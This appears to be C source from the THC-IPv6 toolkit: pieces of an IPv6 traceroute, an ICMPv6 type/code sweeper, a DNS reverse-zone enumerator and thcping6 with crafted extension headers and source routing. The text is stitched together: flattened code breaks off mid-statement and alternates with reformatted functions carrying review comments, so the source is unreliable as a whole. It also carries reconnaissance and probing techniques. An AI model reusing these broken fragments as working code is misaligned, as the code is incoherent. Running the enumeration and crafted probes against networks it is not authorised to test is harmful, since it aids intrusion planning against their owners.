foo6[8] = 1; if ((pkt2 = 
thc_create_ipv6_extended(interface, 0, &pkt2_len, dst6, foo6, i, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt2, &pkt2_len, ICMP6_PINGREQUEST, 0, j, (unsigned char *) &buf, m, 0) < 0) return -1; thc_generate_pkt(interface, foomac, foomac, pkt2, &pkt2_len); ipv6 = (thc_ipv6_hdr *) pkt2; for (m = 0; m < do_toobig + do_frag; m++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid()) < 0) return -1; if (do_dst) { memset(buf3, 0, 6); for (m = 0; m < do_dst; m++) if (thc_add_hdr_dst(pkt, &pkt_len, buf3, 6) < 0) return -1; } if (do_hdr_size) m = do_hdr_size; else m = 14; if (do_reply) { if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREPLY, 0, 1480, (unsigned char *) ipv6->pkt + m, 1280 - 40 - 8 - 8, 0) < 0) return -1; } else if (thc_add_icmp6(pkt, &pkt_len, ICMP6_TOOBIG, 0, 1480, (unsigned char *) ipv6->pkt + m, 1280 - 40 - 8 - 8, 0) < 0) return -1; pkt2 = thc_destroy_packet(pkt2); } else if (udp) { if (thc_add_udp(pkt, &pkt_len, baseport + i, dport, 0, buf_len > 0 ? buf : NULL, buf_len) < 0) return -1; } else if (thc_add_tcp(pkt, &pkt_len, baseport + i, dport, pid, 0, TCP_SYN, 5760, 0, NULL, 0, buf_len > 0 ? buf : NULL, buf_len) < 0) return -1; } if (thc_generate_and_send_pkt(interface, srcmac, mac, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not send packet, exiting ...\n"); exit(-1); } pkt = thc_destroy_packet(pkt); usleep(1000); } else if (position[i] == NULL) up_to = i - 1; } } passed = time(NULL); while (passed + k >= time(NULL) && complete == 0) thc_pcap_check(p, (char *) check_packets, NULL); if (complete == 0 && finaldst == 0 && k + 1 < SENDS && up_to >= MAX_SEND && position[up_to] != NULL /*&& position[up_to][0] != '?' 
*/ ) { if (debug) printf("DEBUG: increasing range from %d to %d\n", up_to, up_to + INCREASE); up_to += INCREASE; } if (debug) printf("DEBUG: run %d of %d, complete %d, range %d\n", k, SENDS, complete, up_to); } thc_pcap_close(p); j = 0; for (i = 1; i <= up_to && position[i] != NULL; i++) if (position[i][0] == '?') j++; else j = 0; if (j > 0) { up_to -= (j - 1); position[up_to] = strdup("!!!"); notreached = 1; } j = 0; for (i = 1; i <= up_to && position[i] != NULL; i++) if (position[i][0] != '?') j++; if (j == 0) { printf("Trace6 for %s unsuccessful, no packets received.\n", argv[optind + 1]); } else { if (tunnel) { snprintf(text, sizeof(text), " with starting MTU %d", orig_mtu); mtu = orig_mtu; } else text[0] = 0; printf("Trace6 for %s (%s)%s:\n", argv[optind + 1], thc_ipv62notation(dst6), text); j = 0; for (i = 0; i <= up_to; i++) if (position[i] == NULL && j == -1) j = i; if (j > 0) up_to = j; for (i = 1; i <= up_to && position[i] != NULL; i++) { if (tunnel && rmtu[i] > 0 && mtu > rmtu[i]) { if (mtu - rmtu[i] < 8) snprintf(text, sizeof(text), " - new MTU %d", rmtu[i]); else if (mtu - rmtu[i] == 20) snprintf(text, sizeof(text), " - new MTU %d - 6in4 tunnel endpoint", rmtu[i]); else if (mtu - rmtu[i] == 28 || mtu - rmtu[i] == 36 || mtu - rmtu[i] == 8 || mtu - rmtu[i] == 16) snprintf(text, sizeof(text), " - new MTU %d - PPP or Teredo tunnel endpoint", rmtu[i]); else if (mtu - rmtu[i] == 64) snprintf(text, sizeof(text), " - new MTU %d - PPTP tunnel endpoint", rmtu[i]); else if (mtu - rmtu[i] == 80) snprintf(text, sizeof(text), " - new MTU %d - AYIYA tunnel endpoint", rmtu[i]); else if (mtu - rmtu[i] > 80) snprintf(text, sizeof(text), " - new MTU %d", rmtu[i]); else snprintf(text, sizeof(text), " - new MTU %d", rmtu[i]); mtu = rmtu[i]; } else text[0] = 0; if (resolve && position[i][0] != '?' 
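/*
 * pcap callback: prints the ICMPv6 type and code of a captured packet.
 *
 * foo    - user pointer supplied to the capture loop, unused here
 * header - pcap capture header; only caplen is read
 * data   - captured bytes, link-layer header first
 *
 * The captured length is validated before any header byte is read. The
 * earlier version read ipv6hdr[0] and ipv6hdr[6] before its length test and
 * subtracted the link header size from the unsigned caplen without checking
 * that caplen was large enough.
 */
void check_packet(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  /* 14 is the link header size used when do_hdr_size is not set */
  unsigned int link_len = do_hdr_size ? (unsigned int) do_hdr_size : 14;
  const unsigned char *ipv6hdr;

  (void) foo;
  /* need the link header plus 48 bytes (same minimum as before) */
  if (header->caplen < link_len || header->caplen - link_len < 48)
    return;
  ipv6hdr = data + link_len;

  /* as before, version and next-header are only verified when do_hdr_size is set */
  if (do_hdr_size && ((ipv6hdr[0] & 240) != 0x60 || ipv6hdr[6] != NXT_ICMP6))
    return;

  printf("Received type %d code %d\n", ipv6hdr[40], ipv6hdr[41]);
}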
argc--; } if (strncmp(argv[1], "-p", 2) == 0) { print = 0; argv++; argc--; } interface = argv[1]; // source and destination IPv6 addresses dst61 = thc_resolve6(argv[2]); if (src61 == NULL) src61 = thc_get_own_ipv6(interface, dst61, PREFER_GLOBAL); if (argc >= 4) tf = tt = atoi(argv[3]); if (argc >= 5) cf = ct = atoi(argv[4]); memset(buf, 0, sizeof(buf)); printf("Sending ICMPv6 Packets to %s%%%s\n", argv[2], argv[1]); srcmac = thc_get_own_mac(interface); dstmac = thc_get_mac(interface, src61, dst61); if (srcmac == NULL) { fprintf(stderr, "Error: illegal interface: %s\n", interface); exit(-1); } if (dstmac == NULL) { fprintf(stderr, "Error: can not resolve target: %s\n", argv[2]); exit(-1); } if (dst61[0] == 0xff) { sprintf(string, "icmp6 and dst %s", thc_ipv62notation(src61)); } else { sprintf(string, "icmp6 and src %s", thc_ipv62notation(dst61)); } if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } for (type = tf; type <= tt; type++) { printf("Sending ICMPv6 type %d ...\n", type); for (code = cf; code <= ct; code++) { //build the packet if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src61, dst61, 255, 0, 0, 0, 0)) == NULL) printf("Packet Creation Failed\n"); //add icmp part if (thc_add_icmp6(pkt, &pkt_len, type, code, flags, buf, sizeof(buf), 0) < 0) return -1; //generate packet if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) { printf("generate failed\n"); return -1; } // send the packet out if (thc_send_pkt(interface, pkt, &pkt_len) < 0) printf("packet not sent \n"); thc_destroy_packet(pkt); //destroy the packet pkt = NULL; pkt_len = 0; if (print) { usleep(10000); while(thc_pcap_check(p, (char *) check_packet, NULL) > 0); } } } if (print) { sleep(3); while(thc_pcap_check(p, (char *) check_packet, NULL) > 0); } printf("Done!\n"); return 0; } 
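/*
 * Opens a UDP socket connected to port 53 of the given DNS server and sets a
 * one second receive timeout on it.
 *
 * server - host name or address of the DNS server
 *
 * Returns the connected socket descriptor. On any failure an error is printed
 * to stderr and the process exits with -1, as before.
 *
 * Changes over the earlier version: every address returned by getaddrinfo()
 * is tried instead of only the first, a socket() failure is no longer reported
 * as a resolution failure, and a failing setsockopt() is reported because the
 * callers block in recv() on this socket.
 */
int dnssocket(char *server) {
  struct addrinfo hints, *ai = NULL, *cur;
  struct timeval tv;
  int s = -1, had_socket = 0;

  tv.tv_sec = 1;                /* 1 sec Timeout */
  tv.tv_usec = 0;               // Not init'ing this can cause strange errors

  memset(&hints, 0, sizeof(hints));
  hints.ai_family = AF_UNSPEC;
  hints.ai_socktype = SOCK_DGRAM;
  hints.ai_protocol = IPPROTO_UDP;
  if (getaddrinfo(server, "53", &hints, &ai) != 0 || ai == NULL) {
    fprintf(stderr, "Error: unable to resolve dns server %s!\n", server);
    exit(-1);
  }

  for (cur = ai; cur != NULL; cur = cur->ai_next) {
    if ((s = socket(cur->ai_family, cur->ai_socktype, cur->ai_protocol)) < 0)
      continue;
    had_socket = 1;
    if (setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)) < 0)
      fprintf(stderr, "Warning: unable to set a receive timeout for dns server %s\n", server);
    if (connect(s, cur->ai_addr, cur->ai_addrlen) == 0)
      break;
    close(s);
    s = -1;
  }
  freeaddrinfo(ai);

  if (s < 0) {
    if (had_socket)
      fprintf(stderr, "Error: unable to connect to dns server %s!\n", server);
    else
      fprintf(stderr, "Error: unable to create a socket for dns server %s!\n", server);
    exit(-1);
  }
  return s;
}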
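/*
 * Appends up to n bytes of src to the NUL-terminated text in out, never
 * writing past cap bytes. Bytes that are not printable are replaced by '?'
 * because the text ends up on the terminal and part of it comes from DNS
 * replies. Returns the new length of the text.
 */
static size_t dnsrev_append(unsigned char *out, size_t cap, size_t used, const unsigned char *src, size_t n) {
  size_t k;

  if (cap == 0 || used >= cap)
    return used;
  for (k = 0; k < n && used + 1 < cap; k++)
    out[used++] = isprint(src[k]) ? src[k] : '?';
  out[used] = 0;
  return used;
}

/* Appends a NUL-terminated C string via dnsrev_append(). */
static size_t dnsrev_append_str(unsigned char *out, size_t cap, size_t used, const char *s) {
  return dnsrev_append(out, cap, used, (const unsigned char *) s, strlen(s));
}

/*
 * Appends the length-prefixed labels that start at msg[off] as "label." text.
 * Stops at a zero length byte, at the end of the received message, or at a
 * label that would run past it. The message itself is not modified.
 * NOTE(review): a length byte that is really a compression pointer is not
 * decoded; it is treated as a length and normally fails the bounds test.
 */
static size_t dnsrev_append_labels(unsigned char *out, size_t cap, size_t used, const unsigned char *msg, int msg_len, int off) {
  int clen;

  while (off >= 0 && off < msg_len && msg[off] != 0) {
    clen = msg[off];
    if (off + 1 + clen > msg_len)
      break;
    used = dnsrev_append(out, cap, used, msg + off + 1, (size_t) clen);
    used = dnsrev_append_str(out, cap, used, ".");
    off += clen + 1;
  }
  return used;
}

/*
 * Enumerates one nibble level of the reverse zone: sends 16 queries (one per
 * hex digit) below the prefix held in range[0..depth-1], collects the replies
 * and recurses into every digit whose reply had a zero value in the low two
 * bits of byte 3 (r[] state 2). At depth 31 a reply with buf2[7] == 1 is
 * printed as a found entry.
 *
 * depth - number of nibbles already fixed, 0..31
 *
 * Returns the number of distinct digits answered, or -1 for an invalid depth.
 * Exits the process when sending fails or the server stops answering.
 *
 * Changes over the earlier version:
 *  - the output line is built with bounded appends; strcat() of reply data
 *    into name[] could overflow it
 *  - reply offsets are checked against the received length, and the reply is
 *    no longer patched with temporary NUL bytes (which could touch the byte
 *    just past the received data)
 *  - a duplicate reply for a digit is ignored instead of being counted, so
 *    rs only reaches 16 when all 16 digits were answered
 */
int deeper(int depth) {
  unsigned char r[16];
  const char *addr;
  int i, j = 0, rs = 0, len, slot, off;
  size_t used;

  if (depth < 0 || depth > 31)
    return -1;

  memset(r, 0, sizeof(r));
  // generate base packet
  cnt++;
  buf[1] = cnt;
  for (i = 0; i < depth; i++) {
    buf[sizeof(buf_start) + 2 + i * 2] = 1;
    buf[sizeof(buf_start) + 2 + i * 2 + 1] = range[depth - i - 1];
  }
  memcpy(buf + sizeof(buf_start) + 2 + depth * 2, buf_end, sizeof(buf_end));
  buf_len = sizeof(buf_start) + 2 + depth * 2 + sizeof(buf_end);

  // loop to finish generation and send
redo:
  for (i = 0; i < 16; i++) {
    if (r[i] != 0)              /* already answered in an earlier round */
      continue;
    buf[0] = i;                 /* the digit is echoed back in the low nibble of byte 0 */
    buf[13] = tohex(i);
    if (send(sock, buf, buf_len, 0) < 0) {
      fprintf(stderr, "Error: can not send to network!\n");
      exit(-1);
    }
    usleep(5);
  }

  // receive and process replies
  /* NOTE(review): wait is cleared by the SIGALRM handler ignore(); its
   * declaration is outside this block - confirm it is safe to poll here */
  wait = 1;
  alarm(waittime);
  while (rs < 16 && wait == 1) {
    len = recv(sock, buf2, sizeof(buf2), 0);
    if (len <= 70 || buf2[1] != cnt)
      continue;
    slot = (buf2[0] & 15);
    if (r[slot] != 0)           /* duplicate reply for this digit */
      continue;
    rs++;
    if ((buf2[3] & 3) != 0) {
      r[slot] = 1;
      continue;
    }
    if (depth != 31) {
      r[slot] = 2;
      continue;
    }
    r[slot] = 3;
    if (buf2[7] != 1)
      continue;

    found++;
    /* rebuild the address from the nibble labels of the question section */
    off = 12;
    for (i = 0; i < 32 && off + 1 < len && buf2[off] == 1; i++, off += 2) {
      if (i % 2 == 0)
        j = tochar(buf2[off + 1]);
      else
        dst6[15 - i / 2] = (tochar(buf2[off + 1]) * 16) + j;
    }

    name[0] = 0;
    used = dnsrev_append_str(name, sizeof(name), 0, "Found: ");
    addr = (const char *) thc_ipv62notation(dst6);
    if (addr != NULL)
      used = dnsrev_append_str(name, sizeof(name), used, addr);
    used = dnsrev_append_str(name, sizeof(name), used, " is ");
    /* 102 is the fixed offset the original code used for the answer's name
     * data; presumably it assumes a 2 byte compressed owner name - confirm */
    used = dnsrev_append_labels(name, sizeof(name), used, buf2, len, 102);
    if (debug) {
      used = dnsrev_append_str(name, sizeof(name), used, " is ");
      used = dnsrev_append_labels(name, sizeof(name), used, buf2, len, 12);
    }
    printf("%s\n", name);
  }
  alarm(0);

  if (rs == 16) {               // all packets received
    for (i = 0; i < 16; i++)
      if (r[i] == 2) {
        range[depth] = tohex(i);
        deeper(depth + 1);
      }
  } else {                      // packet loss / timeout
    if (rs < 16)
      waittime++;
    if (rs < 11)
      waittime++;
    if (rs < 6)
      waittime++;
    if (rs < 2)
      waittime++;
    if ((rs == 0 && (waittime >= WAITTIME_START + 6)) || waittime > 15) {
      fprintf(stderr, "Error: DNS Server %s is not answering or not reliable enough anymore!\n", dst);
      exit(-1);
    }
    fprintf(stderr, "Warning: packet loss, increasing response timeout to %d seconds\n", waittime);
    goto redo;
  }

  return rs;
}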
sizeof(buf_end)); ok = 1; if ((*ptr != '.') && (index((char*)(uintptr_t)ptr, '.') != NULL) && ((ptr2 = (unsigned char*)(uintptr_t)strcasestr((char*)(uintptr_t)ptr, ".ip6.arpa")) != NULL)) { *ptr2 = 0; for (i = strlen(ptr) - 1; i >= 0 && ok == 1; i--) { if ((ptr[i] >= 'A' && ptr[i] <= 'F') || (ptr[i] >= 'a' && ptr[i] <= 'f') || (ptr[i] >= '0' && ptr[i] <= '9')) { range[range_start++] = (char) tolower(ptr[i]); if (i >= 2) { if (ptr[i - 1] != '.') ok = 0; else i--; } } else ok = 0; } } else if (index(ptr, ':') != NULL && (ptr2 = index(ptr, '/')) != NULL) { *ptr2++ = 0; len = atoi(ptr2); if (len % 4 > 0 || len < 4 || len > 124) { fprintf(stderr, "Error: invalid prefix length, must be a multiple of 4!\n"); exit(-1); } if (len < 48) fprintf(stderr, "Warning: prefix length is smaller than 48, usually this does not work.\n"); if (len % 8 > 0) j = (len / 8) + 1; else j = len / 8; if ((dest = thc_resolve6(ptr)) == NULL) { fprintf(stderr, "Error: %s gives not a valid IPv6 address\n", ptr); exit(-1); } for (i = 0; i < j; i++) { range[i * 2] = tohex(dest[i] / 16); range[i * 2 + 1] = tohex(dest[i] % 16); } range_start = len / 4; } else ok = 0; if (ok == 0) { fprintf(stderr, "Error: invalid IPv6 address specified: %s\n", argv[2]); exit(-1); } memset(buf_start, 0, sizeof(buf_start)); memset(buf_end, 0, sizeof(buf_end)); buf_start[2] = 1; buf_start[5] = 1; memcpy(buf, buf_start, sizeof(buf_start)); buf[12] = 1; buf_end[0] = 3; strcpy(buf_end + 1, "ip6"); buf_end[4] = 4; strcpy(buf_end + 5, "arpa"); buf_end[11] = 0x0c; buf_end[13] = 1; signal(SIGALRM, ignore); printf("Starting DNS reverse enumeration of %s on server %s\n", ptr, dst); // first: wildcard check ok = 0; k = 0; sock = dnssocket(dst); for (j = 0; j < 5; j++) { for (i = range_start; i < 32; i++) range[i] = tohex(rand() % 16); switch(send_range()) { case 0: ok++; break; case -1: k++; break; default: i = 0; // ignored } } if (ok > 2) { fprintf(stderr, "Error: Wildcard configured in DNS server, not possible to enumerate!\n"); 
return -1; } if (k == 5) { fprintf(stderr, "Error: DNS server %s sent no replies!\n", dst); return -1; } else if (k > 0) waittime += 2; // starting the search i = deeper(range_start); printf("Found %d entr%s.\n", found, found == 1 ? "y" : "ies"); if (found == 0) return 1; else return 0; } thc-ipv6-2.5/thcping6.c0000644000000000000000000003743112251022441013405 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" struct timespec ts, ts2; int dlen = 8, port = 0, done = 0, resp_type = -1, type = NXT_ICMP6; extern int do_pppoe; extern int do_hdr_off; extern int do_6in4; extern int do_hdr_vlan; void help(char *prg, int help) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-af] [-H t:l:v] [-D t:l:v] [-F dst] [-t ttl] [-c class] [-l label] [-d size] [-S port|-U port|-T type -C code] interface src6 dst6 [srcmac [dstmac [data]]]\n\n", prg); printf("Options:\n"); if (help) { printf(" -a add a hop-by-hop header with router alert option.\n"); printf(" -q add a hop-by-hop header with quickstart option.\n"); printf(" -E send as ethertype IPv4\n"); printf(" -H t:l:v add a hop-by-hop header with special content\n"); printf(" -D t:l:v add a destination header with special content\n"); printf(" -D \"xxx\" add a large destination header which fragments the packet\n"); printf(" -f add a one-shot fragementation header\n"); printf(" -F ipv6address use source routing to this final destination\n"); printf(" -t ttl specify TTL (default: 255)\n"); printf(" -c class specify a class (0-4095)\n"); printf(" -l label specify a label (0-1048575)\n"); printf(" -d data_size define the size of the ping data buffer\n"); } printf(" -T number ICMPv6 type to send (default: 128 = ping)\n"); printf(" -C number ICMPv6 code to send (default: 0)\n"); printf(" -S port use a TCP SYN packet on the defined port instead of ping\n"); printf(" -U port use a UDP packet on the 
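/*
 * pcap callback: classifies a captured reply to the probe, prints one line
 * describing it and records the outcome in resp_type (0 normal reply,
 * 1 error reply). On the first classified reply it arms a 2 second alarm.
 *
 * pingdata - user pointer from the capture loop; compared against the packet
 *            as the payload that was sent
 * header   - pcap capture header; only caplen is read
 * data     - captured bytes, link-layer header first
 *
 * The packet is untrusted input. The captured length is checked before each
 * group of header bytes is read. The earlier version read the fixed header,
 * the fragment header, the TCP flag byte and the MTU field without a length
 * check, and could compare pingdata against memory in front of the packet
 * when dlen was larger than the captured IPv6 length.
 */
void check_packets(u_char *pingdata, const struct pcap_pkthdr *header, const unsigned char *data) {
  /* 14 is the link header size used when do_hdr_size is not set */
  unsigned int link_len = do_hdr_size ? (unsigned int) do_hdr_size : 14;
  int len, min = 0, ok = 0, nxt = 6, offset = 0;
  long usec;
  unsigned int mtu = 0;
  unsigned char *ptr;
  char *frag = "";

  /* a full fixed IPv6 header is needed for ptr[6] and the source address at ptr + 8 */
  if (header->caplen < link_len + 40)
    return;
  ptr = (unsigned char *) (data + link_len);
  len = (int) (header->caplen - link_len);
  if (do_hdr_size && (ptr[0] & 240) != 0x60)
    return;

  /* elapsed time since ts; despite its name usec holds milliseconds */
  clock_gettime(CLOCK_REALTIME, &ts2);
  if (ts2.tv_nsec < ts.tv_nsec) {
    min = 1;
    usec = (int) ((1000000000 - ts.tv_nsec + ts2.tv_nsec) / 1000000);
  } else
    usec = (unsigned long int) ((ts2.tv_nsec - ts.tv_nsec) / 1000000);

  if (ptr[nxt] == NXT_FRAG) {
    if (len < 48)               /* the 8 byte fragment header must be captured */
      return;
    offset += 8;
    nxt = 40;
    frag = " (fragmented)";
  }

  if (ptr[nxt] == NXT_ICMP6) {
    if (len < 44 + offset || ((len + 44 + offset) < dlen && dlen < 1000) || (len + offset < 986 && dlen > 900)) {
      if (debug)
        printf("ignoring too short packet\n");
      return;
    }
    if (dlen < 1000) {
      /* only compare when the payload can actually fit into the packet */
      if (dlen >= 0 && dlen <= len && memcmp(pingdata, ptr + len - dlen, dlen) == 0)
        ok = 1;
    } else {
      if (memcmp(pingdata, ptr + 256 + offset, 100) == 0 || memcmp(pingdata, ptr + 260, 100) == 0 || memcmp(pingdata, ptr + 242, 100) == 0
          || memcmp(pingdata, data + 260 + offset, 100) == 0)
        ok = 1;
    }
    if (ok) {
      printf("%04u.%03ld \t", (int) (ts2.tv_sec - ts.tv_sec - min), usec);
      switch (ptr[40 + offset]) {
      case ICMP6_PINGREPLY:
        printf("pong");
        resp_type = 0;
        break;
      case ICMP6_PARAMPROB:
        printf("icmp parameter problem type %d", ptr[41 + offset]);
        resp_type = 1;
        break;
      case ICMP6_REDIR:
        printf("icmp redirect");
        break;
      case ICMP6_UNREACH:
        printf("icmp unreachable type %d", ptr[41 + offset]);
        resp_type = 1;
        break;
      case ICMP6_TOOBIG:
        /* the MTU field is only decoded when it was captured; otherwise 0 is printed */
        if (len >= 48 + offset)
          mtu = ((unsigned int) ptr[44 + offset] << 24) + ((unsigned int) ptr[45 + offset] << 16) + ((unsigned int) ptr[46 + offset] << 8) + ptr[47 + offset];
        printf("icmp too big (max mtu: %d)", mtu);
        resp_type = 1;
        break;
      case ICMP6_TTLEXEED:
        printf("icmp ttl exceeded");
        resp_type = 1;
        break;
      default:
        /* other ICMPv6 types are ignored, as before */
        break;
      }
    } else
      printf("(ignoring icmp6 packet with different contents (proto %d, type %d, code %d)) ", ptr[nxt], ptr[40 + offset], ptr[41 + offset]);
  } else {
    if (type == NXT_TCP) {
      if (len < 54 + offset) {  /* the flag byte at 53 + offset must be captured */
        if (debug)
          printf("ignoring too short packet\n");
        return;
      }
      printf("%04u.%04ld \ttcp-", (int) (ts2.tv_sec - ts.tv_sec - min), usec);
      switch ((ptr[53 + offset] % 8)) {
      case 2:
        if (ptr[53 + offset] >= TCP_ACK) {
          printf("syn-ack");
          resp_type = 0;
        } else {
          printf("syn (double?)");
          resp_type = 1;
        }
        break;
      case 4:
        printf("rst");
        resp_type = 1;
        break;
      default:
        printf("illegal");
        resp_type = 1;
        break;
      }
    } else
      printf("%04u.%04ld \tudp", (int) (ts2.tv_sec - ts.tv_sec - min), usec);
  }
  printf("%s packet received from %s\n", frag, thc_ipv62notation(ptr + 8));
  if (done == 0 && resp_type >= 0) {
    alarm(2);
    done = 1;
  }
}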
setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (argc > 1 && strncmp(argv[1], "-h", 2) == 0) help(argv[0], 1); if (argc < 3) help(argv[0], 0); memset(buf, 0, sizeof(buf)); while ((i = getopt(argc, argv, "aqfd:D:H:F:t:c:l:S:U:EXn:T:C:")) >= 0) { switch (i) { case 'T': icmptype = atoi(optarg); break; case 'C': icmpcode = atoi(optarg); break; case 'X': debug = 1; break; case 'a': alert = 1; break; case 'q': quick = 1; break; case 'f': frag++; break; case 'E': ether = 1; break; case 'F': route = 1; if ((routers[0] = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", optarg); exit(-1); } routers[1] = NULL; break; case 'S': port = atoi(optarg); type = NXT_TCP; break; case 'U': port = atoi(optarg); type = NXT_UDP; break; case 'D': d_opt = optarg; break; case 'H': h_opt = optarg; break; case 't': ttl = atoi(optarg); break; case 'c': class = atoi(optarg); break; case 'l': label = atoi(optarg); break; case 'n': count = atoi(optarg); break; case 'd': dlen = atoi(optarg); if (dlen > 2096) dlen = 2096; for (j = 0; j < (dlen / 8); j++) memcpy(buf + j * 8, "thcping6", 8); break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0], 0); if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; if (argc - optind == 2) { dst6 = thc_resolve6(argv[optind + 1]); if ((src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: no IPv6 address found for interface %s!\n", interface); exit(-1); } } else { dst6 = thc_resolve6(argv[optind + 2]); if (strcmp(argv[optind + 1], "x") != 0) src6 = thc_resolve6(argv[optind + 1]); else if ((src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: no IPv6 address found for interface %s!\n", interface); exit(-1); } } if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); 
exit(-1); } if (argc - optind >= 4) { if (strcmp(argv[optind + 3], "x") != 0) sscanf(argv[optind + 3], "%x:%x:%x:%x:%x:%x", (unsigned int *) &smac[0], (unsigned int *) &smac[1], (unsigned int *) &smac[2], (unsigned int *) &smac[3], (unsigned int *) &smac[4], (unsigned int *) &smac[5]); else srcmac = NULL; } else srcmac = NULL; if (argc - optind >= 5) { if (strcmp(argv[optind + 4], "x") != 0) sscanf(argv[optind + 4], "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4], (unsigned int *) &dmac[5]); else dstmac = NULL; } else dstmac = NULL; if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, src6, dst6, ttl, 0, label, class, 0)) == NULL) return -1; if (alert || quick) { j = 0; memset(buf2, 0, sizeof(buf2)); if (alert) { buf2[0] = 5; buf2[1] = 2; j = 4; } if (quick) { buf2[j] = 38; buf2[j+1] = 6; buf2[j+3] = 255; j += 8; } while ((j + 2) % 8 != 0) j++; if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf2, j) < 0) return -1; frag_type = NXT_HBH; } if (h_opt != NULL) { memset(buf2, 0, sizeof(buf2)); frag_type = NXT_HBH; oo = h_opt; if ((ol = index(oo, ':')) == NULL) { fprintf(stderr, "Error: option value must be optionnumber:length:value, e.g. 1:2:feab -> %s\n", h_opt); exit(-1); } *ol++ = 0; if ((ov = index(ol, ':')) == NULL) { fprintf(stderr, "Error: option value must be optionnumber:length:value, e.g. 
1:2:feab -> %s\n", h_opt); exit(-1); } *ov++ = 0; buf2[0] = (atoi(oo)) % 256; buf2[1] = (atoi(ol)) % 256; if (*ov != 0) for (i = 0; i < strlen(ov) / 2; i++) { if (tolower(ov[i * 2]) >= 'a' && tolower(ov[i * 2]) <= 'f') j = (ov[i * 2] - 'a' + 10) * 16; else if (ov[i * 2] >= '0' && ov[i * 2] <= '9') j = (ov[i * 2] - '0') * 16; else { fprintf(stderr, "Error: only hexadecimal characters are allowed in value: %s\n", ov); exit(-1); } if (tolower(ov[i * 2 + 1]) >= 'a' && tolower(ov[i * 2 + 1]) <= 'f') j += (ov[i * 2 + 1] - 'a' + 10); else if (ov[i * 2 + 1] >= '0' && ov[i * 2 + 1] <= '9') j += (ov[i * 2 + 1] - '0'); else { fprintf(stderr, "Error: only hexadecimal characters are allowed in value: %s\n", ov); exit(-1); } buf2[2 + i] = j % 256; } if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf2, 2 + (atoi(ol) % 256)) < 0) return -1; } if (frag) { for (k = 0; k < frag; k++) if (thc_add_hdr_oneshotfragment(pkt1, &pkt1_len, getpid() + k) < 0) return -1; if (frag_type == NXT_DST) frag_type = NXT_FRAG; } if (route) { if (thc_add_hdr_route(pkt1, &pkt1_len, routers, 1) < 0) return -1; if (frag_type == NXT_DST) frag_type = NXT_ROUTE; } if (d_opt != NULL) { memset(buf2, 0, sizeof(buf2)); if (d_opt[0] == 'x') { xl = 1; if (thc_add_hdr_dst(pkt1, &pkt1_len, buf2, sizeof(buf2)) < 0) return -1; } else { oo = d_opt; if ((ol = index(oo, ':')) == NULL) { fprintf(stderr, "Error: option value must be optionnumber:length:value, e.g. 1:2:feab: %s\n", h_opt); exit(-1); } *ol++ = 0; if ((ov = index(ol, ':')) == NULL) { fprintf(stderr, "Error: option value must be optionnumber:length:value, e.g. 
1:2:feab: %s\n", h_opt); exit(-1); } *ov++ = 0; buf2[0] = (atoi(oo)) % 256; buf2[1] = (atoi(ol)) % 256; if (*ov != 0) for (i = 0; i < strlen(ov) / 2; i++) { if (tolower(ov[i * 2]) >= 'a' && tolower(ov[i * 2]) <= 'f') j = (ov[i * 2] - 'a' + 10) * 16; else if (ov[i * 2] >= '0' && ov[i * 2] <= '9') j = (ov[i * 2] - '0') * 16; else { fprintf(stderr, "Error: only hexadecimal characters are allowed in value: %s\n", ov); exit(-1); } if (tolower(ov[i * 2 + 1]) >= 'a' && tolower(ov[i * 2 + 1]) <= 'f') j += (ov[i * 2 + 1] - 'a' + 10); else if (ov[i * 2 + 1] >= '0' && ov[i * 2 + 1] <= '9') j += (ov[i * 2 + 1] - '0'); else { fprintf(stderr, "Error: only hexadecimal characters are allowed in value: %s\n", ov); exit(-1); } buf2[2 + i] = j % 256; } if (thc_add_hdr_dst(pkt1, &pkt1_len, buf2, 2 + (atoi(ol) % 256)) < 0) return -1; } } if (argc - optind >= 6) { if (dlen != 8) { fprintf(stderr, "Warning: the data option is ignored if the -d option is supplied\n"); } else { dlen = strlen(argv[optind + 5]); if (dlen > sizeof(buf)) dlen = sizeof(buf) - 1; memcpy(buf, argv[optind + 5], dlen); buf[dlen] = 0; } } if (port == 0) { if (thc_add_icmp6(pkt1, &pkt1_len, icmptype, icmpcode, flags, (unsigned char *) &buf, dlen, 0) < 0) return -1; } else if (type == NXT_TCP) { if (thc_add_tcp(pkt1, &pkt1_len, port, port, (port << 16) + port, 0, TCP_SYN, 5760, 0, NULL, 0, (unsigned char *) &buf, dlen) < 0) return -1; } else if (thc_add_udp(pkt1, &pkt1_len, port, port, 0, (unsigned char *) &buf, dlen) < 0) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } hdr = (thc_ipv6_hdr *) pkt1; if (ether) { if (do_hdr_size) { if (do_pppoe) { 